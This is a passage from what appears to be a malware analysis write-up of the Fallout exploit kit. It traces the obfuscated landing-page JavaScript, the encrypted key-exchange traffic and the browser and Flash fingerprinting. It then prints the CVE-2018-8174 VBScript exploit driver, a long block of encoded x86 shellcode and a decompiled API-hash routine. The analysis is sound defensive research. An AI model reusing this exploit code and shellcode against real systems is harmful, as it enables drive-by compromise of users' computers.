(CVE-2018-8174 + SWF Loader) 5. CVE-2018-15982 6. PowerShell Code 7. Malware </code></pre></div></div> In this way, an attack is performed by seven traffics. Let’s look at each one in order. (In the following, we will use different traffic data from the above. The detailed reason will be mentioned later, but it is difficult to capture and analyze traffic at the same time) <h2 id="landing-page--js-code--encoded-data">Landing Page + JS Code + Encoded Data</h2> In the landing page, JavaScript code is read first. <div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><!DOCTYPE html> <html> <head> <meta http-equiv="x-ua-compatible" content="IE=10"> <script type="text/javascript" src="/04_09_2003/Symposium?Peristele=02_03_1943&LE3r=Aps&ILZhH=Frazzling-Anorexias"></script> </head> </code></pre></div></div> This includes CryptoJS and BigInteger obfuscated. Excluding the large library parts, there is very little processing. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// key window.III1l1 = window["Il1IIllIlI1I"]["IIIlI"]["II1I1lI1I"]["ll1llI1"]("8b69cbdfc5fe43e69b7920c8ee721fc9"); // iv window.II1ll11I = window["Il1IIllIlI1I"]["IIIlI"]["II1I1lI1I"]["ll1llI1"]("301ae8205ddcd5897df69e3b0c056c34"); // aes_decrypt(enc_data, key, iv) window.l11llIll = window["Il1IIllIlI1I"]["lI11lIl"]["l11II11l"]("p4N9IqH/oiAKHkDCR0zXXfrvhwVrVPsFZSNUjkVFXxxBofjpd5JLM1sdAega3oRy", III1l1, { lI1lIl1Ill: II1ll11I })["lIlIlll11l"](window["Il1IIllIlI1I"]["IIIlI"]["Il11I1II"]); </code></pre></div></div> First, two data (<code class="language-plaintext highlighter-rouge">8b69cbdfc5fe43e69b7920c8ee721fc9</code> and <code class="language-plaintext highlighter-rouge">301ae8205ddcd5897df69e3b0c056c34</code>) will appear. This is a key and an IV for AES encryption. By decrypting the next Base64 character string using these keys and IV, the necessary data (specifically, the URL for acquiring encoded data used in the next step) can be obtained. . When it tries decoding, it becomes like this. <img src="https://nao-sec.org/assets/2019-07-09/02.png" alt="" /> Next is the process of checking which browser is being used. Depending on it, Opera, Firefox, IE or Chrome is investigated. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// check browser window["String"]["prototype"]["II1l1IlI"] = function () { return (!!window["opr"] && !!window["opr"]["addons"] || !!window["opera"] || navigator["userAgent"]["indexOf"](" OPR/") >= 0) + this + (typeof window["InstallTrigger"] !== "undefined") + this + (false || !!window["document"]["documentMode"]) + this + (!!window["chrome"] && !!window["chrome"]["runtime"]) }; </code></pre></div></div> Then there is a process to check the version of Adobe Flash Player. This data will be used later. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(function () { window.l1l111I = ''; try { window.l1l111I = new ActiveXObject('ShockwaveFlash.ShockwaveFlash').getVariable('$version') } catch (e) {} })(); </code></pre></div></div> The process then returns to the landing page. In the landing page, one function is defined and executed. Let’s look at that function. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// str_A var l1ll1 = window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](); // str_B var lIlII11 = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16); // str_C var ll1l1IlIIIll = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16); // str_D var lll1II = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16); // str_E => str_B.modPow(str_C, str_D) var l11IlIl = lIlII11['ll11IIl'](ll1l1IlIIIll, lll1II); </code></pre></div></div> Here, many processes such as <code class="language-plaintext highlighter-rouge">window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l']()</code> appear. This is defined in CryptoJS and generates a 32 character random hexadecimal string. After generating four random data, use the second, third and fourth of them to generate the fifth data. Here modPow is used. The five data prepared here will be used in the ensuing cryptographic process. We call them str_A, str_B, str_C, str_D, str_E. The following code is divided into three parts. <code class="language-plaintext highlighter-rouge">Onreadystatechange</code> after the first one has sent a request to the server. The process of generating data to be sent by the second. The third is the process to send. These are the standard XMLHttpRequest POST procedures. First, let’s look at the process of generating transmission data. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var l11IlIIlllll = {}; l11IlIIlllll['lIlII11'] = lIlII11['lIlIlll11l'](16); // str_B l11IlIIlllll['lll1II'] = lll1II['lIlIlll11l'](16); // str_D l11IlIIlllll['l11IlIl'] = l11IlIl['lIlIlll11l'](16); // str_E l11IlIIlllll['lI1lIl1Ill'] = l1ll1; // str_A // browser check data l11IlIIlllll['II1l1IlI'] = '@@' ['II1l1IlI'](); </code></pre></div></div> Five data have been added to the array <code class="language-plaintext highlighter-rouge">l11IlIIlllll</code>. Other than the last one is the random data created earlier. There are 5 random data, but the data other than str_C is send data. The last one is the browser check data generated earlier. It checks whether the browser is Opera, Firefox, IE or Chrome, respectively, and contains true or false and is concatenated with <code class="language-plaintext highlighter-rouge">@@</code>. Such data is prepared for send. It should be noted here that str_C has not been sent to the server. Next, let’s look at the sending process. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>window['I1l1I1'](Il1I11l, "post", l11llIll, true); /* -- snip -- */ // Send POST window['l1lllIIlI']( Il1I11l, // aes_encrypt(data, key, iv) window['Il1IIllIlI1I']['lI11lIl']['Ill1lI1Ill']( window['IIII1Il'](l11IlIIlllll), // post request data window['III1l1'], // key { lI1lIl1Ill: window['II1ll11I'] } // iv )['lIlIlll11l']() ); </code></pre></div></div> This is also a general request sending process. The URL is a string decoded by AES earlier. The data to be sent is the previously prepared data, but these are encrypted by AES. The key and IV are the same as those used to decode the URL. The previous data to be encrypted looks like this. <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{ "lIlII11":"c81e728d9d4c2f636f067f89cc14862c", "lll1II":"a87ff679a2f3e71d9181a67b7542122c", "l11IlIl":"3f05415ebff145466040f6a73dca8704", "lI1lIl1Ill":"c4ca4238a0b923820dcc509a6f75849b", "II1l1IlI":"false@@false@@true@@false" } </code></pre></div></div> The data actually sent is encrypted in this way. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>TvU4TAyld3MNlDcMtLwxBo+uVXAbIB1jpPO1a9HDv2dZs7HonG67s8heWoMyvnUFqFBdoEhU0STYjHHQxX6DK7x7Z1naG/2TAdm+AR5l6gpYVl4jXB9oOOyfJtZrfJHabQT5Jhlqv1dtvsJ+0G27qhamqtPT16wCpXn2R2WHf8NJu9SvXSSVadW7sT6QDt32Jt0z3oR0VIlpuE/w3snfKDNIjJYhuMz/VGYIL9WNdg0hC26sxB5fJ5fOOuifh2rNk9GgNsNdfVP01Tf77GRDu9puTbgfsgYOnCz0ONOmp05B14kJ1tK8ZI6ciOWLvOYV </code></pre></div></div> Let’s look at the process after sending. <code class="language-plaintext highlighter-rouge">onreadystatechange</code> is called. Here, two AES decodings are performed. Let’s first look at the first decoding process. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// aes_decrypt(enc_data, key, iv) var lIlIl1IIl11 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( Il1I11l['responseText'], // enc_data window['III1l1'], // key { lI1lIl1Ill: window['II1ll11I'] } // iv )['lIlIlll11l'](window['Il1IIllIlI1I']['IIIlI']['Il11I1II']); var l1I1l1 = window['lIl11'](lIlIl1IIl11); </code></pre></div></div> POST response data is encrypted with AES. The keys and IV are the same as before, and the hard-coded values (<code class="language-plaintext highlighter-rouge">8b69cbdfc5fe43e69b7920c8ee721fc9</code> and <code class="language-plaintext highlighter-rouge">301ae8205ddcd5897df69e3b0c056c34</code>) are hard-coded in the JavaScript code. Jsonify is performed because the JSON data can be obtained by decoding. The decoded JSON data looks like this. <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{ "IlI1l":"9b412e5c651d73fd1e271dd63f6901a0", "I1111":"r+sZGwxURs48PDt8pilYLNYjKbVrMHSmlgv0jeEE7qd8KN+KbbqRpYBUUrEFfM5VSLfRPthHQmyzFoY7fuCtOQQ9vUiMBC+3\/pL…" } </code></pre></div></div> Decode the second data using the first (32-character hexadecimal string) of this data. The first data is called str_F. Also, decoding is done with AES, but the key and IV are different from before. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var lIlll1IIlI = window['l1l1IIlIlI'](l1I1l1['lIlll1IIlI'], 16); // str_F // key (str_G) => str_F.modPow(str_C, str_D) var llIIlI = lIlll1IIlI['ll11IIl'](ll1l1IlIIIll, lll1II); var I1Il1I1 = llIIlI['lIlIlll11l'](16); var IIIIlI1IllII = 32 - I1Il1I1.length; while (IIIIlI1IllII > 0) { I1Il1I1 = '0' + I1Il1I1; IIIIlI1IllII--; } var II1ll = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](I1Il1I1); var lI1lIl1Ill = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](l1ll1); // aes_decrypt(enc_data, key, iv) var Il11lII1 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( l1I1l1['lIlIl1IIl11'], // enc_data II1ll, // str_G { lI1lIl1Ill: lI1lIl1Ill } // iv => str_A ); </code></pre></div></div> The values generated by str_F, str_C and str_D are called str_G. Thus, str_C is required to decode the data, but str_C has not been sent to the server. By looking at the traffic data, you can see str_E and str_G created by str_C, but it is impossible to find str_C. Please see Wikipedia for details. <ul> <li><a href="https://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange">Diffie–Hellman key exchange - Wikipedia</a></li> </ul> The data thus decoded is executed as JavsScript. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// eval II1Il['ll1I1'](); </code></pre></div></div> Let’s look at the executed code. First, the URL used next is decoded. The key and IV used at this time are hard-coded initial values. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// aes_decrypt(enc_url, key, iv) var l11l1I1 =window["Il1IIllIlI1I"]["lI11lIl"]["l11II11l"]( "l9kie2x7t4Iq4hRNA3G3Juz+buSrv9OSyATsAvZRjsoWkjatAa3Am6oRnar5jjv2N8XFpvDYQbKswFbyKiGPXM/eRwj5+hz4hg+dTKr5BLk=", III1l1, { lI1lIl1Ill:II1ll11I } )["lIlIlll11l"](window["Il1IIllIlI1I"]["IIIlI"]["Il11I1II"]); </code></pre></div></div> Then, as before, the function is called. Let’s look at the function. First, define the necessary data for encryption/decryption as before. Give each one a name as before. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// str_A2 var l1ll1 = window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](); // str_B2 var lIlII11 = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](),16); // str_C2 var ll1l1IlIIIll = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](),16); // str_D2 var lll1II = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](),16); // str_E2 => str_B2.powMod(str_C2, str_D2) var l11IlIl = lIlII11['ll11IIl'](ll1l1IlIIIll,lll1II); </code></pre></div></div> Next, prepare the data to send as a POST request. Unlike before, Adobe Flash Player version information is also sent. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var l11IlIIlllll = {}; l11IlIIlllll['lIlII11'] = lIlII11['lIlIlll11l'](16); // str_B2 l11IlIIlllll['lll1II'] = lll1II['lIlIlll11l'](16); // str_D2 l11IlIIlllll['l11IlIl'] = l11IlIl['lIlIlll11l'](16); // str_E2 l11IlIIlllll['lI1lIl1Ill'] = l1ll1; // str_A2 l11IlIIlllll['II1l1IlI'] = '@@'['II1l1IlI'](); // browser check data l11IlIIlllll['l1l111I'] = window['l1l111I']; // Adobe Flash Player version check data </code></pre></div></div> The sending process is the same as the previous one. The key and IV used in this case are also initial values. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>window['I1l1I1'](Il1I11l,"post",l11l1I1,true); window['l1lllIIlI']( Il1I11l, // aes_encrypt window['Il1IIllIlI1I']['lI11lIl']['Ill1lI1Ill']( window['IIII1Il'](l11IlIIlllll), // POST Data window['III1l1'], // key {lI1lIl1Ill:window['II1ll11I']} // iv )['lIlIlll11l']() ); </code></pre></div></div> Thus, <code class="language-plaintext highlighter-rouge">onreadystatechange</code> is called as well. Here too, the decoding process is performed as before. First, decode POST response data with the same key and IV as before. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// aes_decrypt(enc_data, key, iv) var lIlIl1IIl11 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( Il1I11l['responseText'], // enc_data window['III1l1'], // key {lI1lIl1Ill:window['II1ll11I']} // iv )['lIlIlll11l'](window['Il1IIllIlI1I']['IIIlI']['Il11I1II']); </code></pre></div></div> When jsonify the decoded result, three data are included like this. The first 32-character hexadecimal string is called str_F2. <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{ "lIlll1IIlI": "87e087b48d4b06215f486021f23f5470", "lIIIIllIl1": "oUeRtTwLk9lLYqMwZC3AM49H8HDw15IqymZ0W\/vw87Vd9RtdXhps9ZppZc\/INO01Bqk79BOMS9ykHCDPE\/\/kWCHQuuh0\/rr…", "II11lIl11": "88HY4nkc9TWmnRPi\/hEPmk8ZCTJ5tIwItosOTmqFjUBFxCXfoXdMKas+TeKLUbdwsXAhvGa35wNmMnajdPzt1huWerzwnhoGcFP…" } </code></pre></div></div> Decrypt these data. Thus two data are decoded. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var lIlll1IIlI = window['l1l1IIlIlI'](l1I1l1['lIlll1IIlI'],16); // str_G2 => str_F2.modPow(str_C2, str_D2) var llIIlI = lIlll1IIlI['ll11IIl'](ll1l1IlIIIll,lll1II); var I1Il1I1 = llIIlI['lIlIlll11l'](16); var IIIIlI1IllII = 32 - I1Il1I1.length; while(IIIIlI1IllII > 0) { I1Il1I1 = '0'+I1Il1I1; IIIIlI1IllII--; } var II1ll = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](I1Il1I1); // str_G2 var lI1lIl1Ill = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](l1ll1); // str_A2 // aes_decrypt() var I1II111I1 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( l1I1l1['lIIIIllIl1'], // enc_data_1 II1ll, // str_G2 {lI1lIl1Ill: lI1lIl1Ill} // str_A2 ); var IIIIl = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( l1I1l1['II11lIl11'], // enc_data_2 II1ll, // str_G2 {lI1lIl1Ill: lI1lIl1Ill} // str_A2 ); </code></pre></div></div> The data thus decoded is written to Body and executed. The decoded data is the CVE-2018-8174 exploit code and the CVE-2018-15982 exploit code for reading swf loader. <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if(IlIII1lll['length'] !== 0) { var IIlIl = window['document']['createElement']("iframe"); IIlIl['setAttribute']("id", "IlIlll1I1"); window['document']['getElementsByTagName']("BODY")[0].appendChild(IIlIl); var I11I11IIlIII = window['document']['getElementById']("IlIlll1I1")['contentWindow']['document']; I11I11IIlIII['open'](); I11I11IIlIII['write'](IlIII1lll); I11I11IIlIII['close'](); } if(lIl1l1I['length'] !== 0) { var l1III11 = window['document']['createElement']("iframe"); l1III11['setAttribute']("id", "lII1I1IlI1I"); window['document']['getElementsByTagName']("BODY")[0].appendChild(l1III11); var llIll1lI = window['document']['getElementById']("lII1I1IlI1I")['contentWindow']['document']; llIll1lI['open'](); llIll1lI['write'](lIl1l1I); llIll1lI['close'](); } </code></pre></div></div> For swf loader, the following code is executed. <div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><html> <head> <meta http-equiv="x-ua-compatible" content="IE=10"> </head> <body> <div id="BnjJbx"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="205" height="528" id="BnjJbx" align="middle"> <param name="movie" value="/24_02_1964/05_04_1933/3410-Skegger-12666" /> <param name="quality" value="high" /> <param name="bgcolor" value="#ffffff" /> <param name="play" value="true" /> <param name="loop" value="true" /> <param name="wmode" value="window" /> <param name="scale" value="showall" /> <param name="menu" value="false" /> <param name="devicefont" value="false" /> <param name="salign" value="" /> <param name="allowScriptAccess" value="sameDomain" /></object></div> </body> </html> </code></pre></div></div> Thus, the swf file that exploits CVE-2018-15982 is read and executed. <h2 id="cve-2018-8174">CVE-2018-8174</h2> The exploit code used is very similar to PoC. <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sub StartExploit UAF InitObjects vb_adrr=LeakVBAddr() vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr)) msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll") krb_base=GetBaseFromImport(msv_base,"kernelbase.dll") ntd_base=GetBaseFromImport(msv_base,"ntdll.dll") VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect") NtContinueAddr=GetProcAddr(ntd_base,"NtContinue") SetMemValue GetShellcode() ShellcodeAddr=GetMemValue()+8 SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr) lIlll=GetMemValue()+69596 SetMemValue ExpandWithVirtualProtect(lIlll) llIIll=GetMemValue() ExecuteShellcode End Sub StartExploit </code></pre></div></div> The process to generate shellcode is like this. <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Function GetShellcode() IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("%u8B55%u83EC%uF8E4%uEC81%u00CC%u0000%u5653%uE857%u08B0%u0000%uF08B%u44C7%u1824%u05CD%u5379%u848D%uB024%u0000%u8900%u2474%u8934%u2444%u8D14%u2454%u8D10%u2444%uC744%u2444%u1D1C%u2BDE%u8982%u2444%u8D10%u244C%u8D14%u2484%u0094%u0000%u4489%u2824%u448D%u1824%u8D50%u2444%u502C%u1EE8%u0006%u8B00%u245C%u8D18%u244C%u8B18%u247C%u8B1C%u8903%u2444%u8B40%u1C47%u4489%u4424%u478B%u8920%u2444%u3348%u89C0%u2444%u8918%u2444%u891C%u2444%uE834%u02E9%u0000%u548D%u1C24%uCF8B%u66E8%u0002%u8300%u2464%u0038%u4C8D%u2024%u406A%uE856%u02FE%u0000%uC683%u8D40%u244C%u6828%u0080%u0000%uE856%u02EC%u0000%u74FF%u2C24%u4C8B%u5024%u448D%u4824%u74FF%u2C24%uD68B%u74FF%u4824%u5753%u8D50%u2444%u5060%u448D%u4C24%uE850%u0389%u0000%uDB33%uC483%u3938%u245C%u742C%u8B41%u2474%u8D38%u2444%u6A48%u5F44%u5357%uFF50%u83D6%u0CC4%u7C89%u4824%u448D%u1824%u106A%u5053%uD6FF%uC483%u8D0C%u2444%u5018%u448D%u4C24%u5350%u6853%u0000%u0800%u5353%uFF53%u2474%u5350%u54FF%u6424%uFF53%u2454%u5F44%u5B5E%uE58B%uC35D%u8B55%u83EC%u0CEC%u458B%u890C%uF445%u458B%u8908%uF845%u6583%u00FC%u07EB%u458B%u40FC%u4589%u8BFC%uFC45%u453B%u7310%u8B12%uF845%u4503%u8BFC%uF44D%u4D03%u8AFC%u8809%uEB08%uC9DF%u55C3%uEC8B%u458B%u0F08%u00BE%uC085%u2D74%u458B%u0F08%u00BE%uF883%u7C41%u8B19%u0845%uBE0F%u8300%u5AF8%u0E7F%u458B%u0F08%u00BE%uC083%u8B20%u084D%u0188%u458B%u4008%u4589%uEB08%u5DC9%u55C3%uEC8B%u8B51%u0845%u4589%uEBFC%u8B07%uFC45%u8940%uFC45%u458B%u0FFC%u00BE%uC085%u0274%uEDEB%u458B%u2BFC%u0845%uC3C9%u5653%u8B57%u33D9%u53FF%u3347%uE8F6%uFFC9%uFFFF%u8B59%u85C8%u74C9%u0F24%u03B6%uD233%uC703%uF1BF%u00FF%uF700%u43F7%uFA8B%uD233%u048D%uBE3E%uFFF1%u0000%uF6F7%uF28B%uE983%u7501%uC1DC%u10E6%u048D%u5F37%u5B5E%u55C3%uEC8B%uEC83%u5310%u5756%uF98B%u5589%u33FC%u8BF6%u3C47%u5C8B%u7838%uDF03%u438B%u8B1C%u204B%uC703%u4589%u03F0%u8BCF%u2443%uC703%u4D89%u89F8%uF445%u7339%u7618%u8B18%uB10C%uCF03%u7BE8%uFFFF%u3BFF%uFC45%u1074%u4D8B%u46F8%u733B%u7218%u33E8%u5FC0%u5B5E%uC3C9%u458B%u8BF4%uF04D%uB70F%u7004%u048B%u0381%uEBC7%u64EA%u30A1%u0000%u8B00%u0C40%u408B%u8B14%u8B00%u8B00%u1040%u64C3%u30A1%u0000%u8B00%u0C40%u408B%u8B14%u8B00%u1040%u56C3%u8B57%u8BF9%u56F2%u078B%uD0FF%uC085%u0675%u478B%u5604%uD0FF%u5E5F%u56C3%uF18B%uE856%uFEAB%uFFFF%u8B59%uE8CE%uFF06%uFFFF%u3D5E%u06DE%u3F54%u1F74%u413D%uCD05%u7425%u3D18%u0309%u0F05%u1174%uEC3D%u1803%u7416%u3D0A%u044B%u19F3%u0374%uC033%u33C3%u40C0%u55C3%uEC8B%uEC81%u013C%u0000%u418B%u5308%u5756%uFA8B%uDB33%u518B%u890C%uF855%u518B%u8B10%u1449%u6A53%u8902%uFC55%u4D89%uFFF4%u8BD0%u83F0%uFFFE%u4074%u858D%uFEC8%uFFFF%u85C7%uFEC8%uFFFF%u0128%u0000%u5650%u55FF%u85F8%u74C0%u8D27%uEC8D%uFFFE%uE8FF%uFF6F%uFFFF%uC085%u1575%u858D%uFEC8%uFFFF%u5650%u55FF%u85FC%u75C0%u56E2%u55FF%uEBF4%u3303%u43DB%u1F89%u5E5F%uC95B%u55C3%uEC8B%uEC83%u5310%u5756%uC033%uF98B%u3340%u53C9%uA20F%uF38B%u8D5B%uF05D%u0389%u7389%u8904%u084B%u5389%u8B0C%uF845%uE8C1%u891F%u5F07%u5B5E%uC3C9%u8B55%u81EC%u04EC%u0001%u5300%u3356%u57F6%uC68B%u8488%uFC05%uFFFE%u40FF%u003D%u0001%u7200%u8BF1%u8BDE%u8BFE%u8AF1%u3D94%uFEFC%uFFFF%uC78B%uE083%u0F07%uCAB6%uB60F%u3004%uC303%uC803%uB60F%u8AD9%u1D84%uFEFC%uFFFF%u8488%uFC3D%uFFFE%u47FF%u9488%uFC1D%uFFFE%u81FF%u00FF%u0001%u7200%u8BC8%u0C7D%uF633%uDE8B%uFF85%u5574%u458B%u8908%u0C45%u438D%u0F01%uD8B6%u948A%uFC1D%uFFFE%u0FFF%uC2B6%uC603%uB60F%u8AF0%u3584%uFEFC%uFFFF%u8488%uFC1D%uFFFE%u88FF%u3594%uFEFC%uFFFF%uB60F%u1D8C%uFEFC%uFFFF%uB60F%u03C2%u8BC8%u0C45%uB60F%u8AC9%u0D8C%uFEFC%uFFFF%u0830%u8940%u0C45%uEF83%u7501%u8BB1%u0845%u5E5F%uC95B%u55C3%uEC8B%uEC83%u8B48%u1C45%u4D89%u53F4%u8B56%u8B08%u0870%u4D89%u8BF8%u0448%u4D89%u8BF0%u0C48%u4D89%u8BE8%u1048%u4D89%u8BE0%u1448%u4D89%u8BD8%u1848%u458B%u5714%u046A%u5589%u8BEC%u1850%u4D89%u8BC8%u2448%u458B%u6818%u1000%u0000%u046A%u006A%u388B%u5589%u89D4%uFC4D%u7D89%uFFD0%u6AD2%u8B04%u6AD8%u5300%u5D89%uFFE4%u83D7%u207D%u8D00%u1445%u046A%u5350%u1875%u7D83%u0024%u0975%u45C7%uC614%u90EA%uEB2A%uC71D%u1445%uF9D7%u2A90%u14EB%u7D83%u0024%u45C7%uD214%u90EB%u752A%uC707%u1445%uE4D2%u2A90%u29E8%uFFFC%u8BFF%u084D%u458D%u83C0%u0CC4%u45C7%uF4C0%uDBBC%uC770%uC445%uE14D%u1989%u086A%uE850%uFE76%uFFFF%u5959%uDB33%u458D%u53C0%u5353%u5053%u55FF%u8BF8%u85F8%u75FF%u8B0A%u1045%u1889%u23E9%u0001%u5300%u6A53%u5303%u6853%u01BB%u0000%u75FF%u57F4%u55FF%u8BF0%u89D8%u145D%uDB85%u840F%u00FB%u0000%u4D8B%u8D08%uB845%u086A%uC750%uB845%uC6E5%u1DB0%u45C7%u7CBC%uB9D1%uE819%uFE1C%uFFFF%u5959%uC033%u6850%u3000%u8080%u5050%uFF50%uEC75%u458D%u50B8%uFF53%uE855%uD88B%uDB85%u840F%u00B8%u0000%u046A%u75FF%u6AE4%u6A00%u5300%u55FF%u85E0%u0FC0%uA084%u0000%u8300%u1C65%u8D00%uDC45%u6583%u00DC%u8D50%u1845%u45C7%u0418%u0000%u5000%u458D%u501C%u0568%u0000%u5320%u55FF%u83D8%u187D%u7400%u8376%u1C7D%u7400%u6A70%u6804%u1000%u0000%u75FF%u6A1C%uFF00%uD455%u75FF%u8B1C%u0C4D%u006A%u8950%uFF01%uD055%u6583%u00CC%u458D%u50CC%u458B%uFF0C%u1C75%u30FF%uFF53%uC855%uFF53%uFFD6%u1475%uD6FF%uFF57%u83D6%u207D%u8B00%uFC75%u0474%u006A%uD6FF%u7D83%u0024%u0474%u006A%uD6FF%u458B%uFF0C%u1C75%u4D8B%uFF08%uE830%uFD52%uFFFF%u458B%u5910%uC759%u0100%u0000%uEB00%u5311%uD6FF%u75FF%uFF14%u57D6%uD6FF%u458B%u8310%u0020%u5E5F%uC95B%u55C3%uEC8B%uEC83%u5310%u8B56%u8BF1%u57DA%u7589%uE8FC%uFBF7%uFFFF%uF88B%u43BA%u1C04%u8B19%uE8CF%uFB83%uFFFF%u368B%u75BA%uB905%u8B28%u89CF%u1446%u72E8%uFFFB%u8BFF%uFC75%u51BA%u3209%u8B73%u890E%u1C41%uCF8B%u5EE8%uFFFB%u8BFF%uBA0E%u0614%u33F5%u4189%u8B08%uE8CF%uFB4D%uFFFF%u0E8B%u97BA%u8104%u891D%u8B01%uE8CF%uFB3D%uFFFF%u0E8B%u4DBA%u8505%u8927%u0441%uCF8B%u2CE8%uFFFB%u8BFF%uBA0E%u04E4%u2259%u4189%u8B0C%uE8CF%uFB1B%uFFFF%u0E8B%uD3BA%u7004%u891F%u1041%uCF8B%u0AE8%uFFFB%u8BFF%uBA0E%u047A%u1A1E%u4189%u8B18%uE8CF%uFAF9%uFFFF%u0E8B%uF3BA%u8503%u8915%u2041%uCF8B%uE8E8%uFFFA%u8BFF%u890E%u2441%u58E8%uFFFB%uBAFF%u028C%u08D8%uC88B%uD2E8%uFFFA%u8BFF%u6A0B%u890C%u8D01%uF045%u4D8B%u500C%u45C7%uC2F0%u8DE0%uC720%uF445%uB412%u37CD%u45C7%uEFF8%uF16B%uE8A4%uFC34%uFFFF%u5959%u0E8B%u558D%uE8F0%uFB2B%uFFFF%uF88B%u5DBA%u1006%u8B36%uE8CF%uFA91%uFFFF%u758B%uBA08%u0584%u29FB%u0E8B%u4189%u8B0C%uE8CF%uFA7D%uFFFF%u0E8B%u55BA%uC706%u8935%u1441%uCF8B%u6CE8%uFFFA%u8BFF%uBA0E%u078C%u4B92%u4189%u8B10%uE8CF%uFA5B%uFFFF%u0E8B%u55BA%u6406%u8936%u0841%uCF8B%u4AE8%uFFFA%u8BFF%uBA0E%u051D%u245C%u4189%u8B04%uE8CF%uFA39%uFFFF%u0E8B%u46BA%uC006%u8935%u8B01%uE8CF%uFA29%uFFFF%u0E8B%u5E5F%u895B%u1841%uC3C9%uECD7%u2182%uA319%u2DD6%u29FE%uCBFE%u5CE9%uB27D%u501A%uCF26%u6A47%u54FE%uDABA%u8A85%uEF83%u3361%u09D1%u20F7%u16EC%uD9B7%u917A%uDE1A%u2281%uEA7F%u3143%u6ACE%u1A52%u4FF4%u500B%uC276%u5A57%uC1F8%uE09A%u258F%uA209%u6BCD%u28EE%uE3E7%u2FD5%u8D28%u3568%uAE4A%u0623%u309B%u8E87%uE4E0%u8EF7%u5F02%u7AB4%u73DA%u7483%uB0D2%uBC0E%uB049%u40EE%u8610%u7665%u07AF%u7330%u3C80%u6436%uF745%u5A61%uC1F8%uBBE2%u5581%uF71D%u00A7%u7F8D%u4907%u11AF%uB565%uF4E6%u755E%u19EE%u23AF%u8DB6%uEB89%u2838%u11BF%uC109%u1219%uD17E%uBEEA%uDD49%uF759%u09D6%uEA08%u8E45%uB602%u1B93%u19C4%u9146%uB94D%u9E6C%u0BC7%u00E8%u0000%u5800%uE883%u2D05%u00C0%u0000%u00C3" &lIIII(IIIII(""))) IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141")) GetShellcode=IIlI End Function </code></pre></div></div> Let’s read shellcode. <h2 id="shellcode">Shellcode</h2> The decoding algorithm in the shellcode has not changed from v3 and remains RC4. <a href="https://nao-sec.org/2019/03/analysis-of-fallout-exploit-kit-v3.html">Analysis of Fallout Exploit Kit v3</a> The hash algorithm of API hash has not changed either. API hashed by the dualaccModFFF1Hash algorithm. <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>unsigned int __thiscall dualaccModFFF1Hash(unsigned __int8 *this) { unsigned __int8 *v1; // ebx int v2; // edi unsigned int v3; // esi int i; // ecx unsigned int v5; // edx v1 = this; v2 = 1; v3 = 0; for ( i = zz_count(this); i; --i ) { v5 = (v2 + (unsigned int)*v1++) % 0xFFF1; v2 = v5; v3 = 